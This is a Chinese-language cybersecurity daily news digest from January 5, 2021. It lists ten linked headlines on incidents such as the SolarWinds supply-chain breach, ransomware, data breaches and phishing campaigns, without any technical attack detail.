https://www.zdnet.com/article/malware-uses-wifi-bssid-for-victim-identification/
网络安全日报 2021年01月05日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、SolarWinds 供应链攻击已影响多达250家政府和企业 https://www.securityweek.com/over-250-organizations-breached-solarwinds-supply-chain-hack-report 2、Apex实验室称患者数据在勒索软件攻击中被盗 https://www.securityweek.com/apex-laboratory-says-patient-data-stolen-ransomware-attack 3、英国法官拒绝美国引渡维基解密创始人阿桑奇 https://www.securityweek.com/uk-judge-refuses-us-extradition-wikileaks-founder-assange 4、MuddyWater攻击从GitHub下载了PowerShell脚本 https://securityaffairs.co/wordpress/112972/hacking/muddywater-attack-github-imgur.html 5、NCA逮捕了21位WeLeakInfo服务的客户 https://securityaffairs.co/wordpress/112935/cyber-crime/nca-arrested-weleakinfo-customers.html 6、研究人员使用Google语音文本API绕过音频reCAPTCHA https://threatpost.com/researcher-breaks-recaptcha-speech-to-text-api/162734/ 7、T-Mobile报告了数据泄露事件 https://threatpost.com/t-mobile-another-data-breach/162703/ 8、微软未发布的Core Polaris操作系统在线泄漏 https://www.bleepingcomputer.com/news/microsoft/microsofts-unreleased-windows-core-polaris-os-leaks-online/ 9、研究人员在暗网发现100万个游戏公司内部账户 https://www.infosecurity-magazine.com/news/one-million-compromised-accounts/ 10、PayPal短信网络钓鱼活动试图窃取用户凭据 https://www.bleepingcomputer.com/news/security/beware-paypal-phishing-texts-state-your-account-is-limited/
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页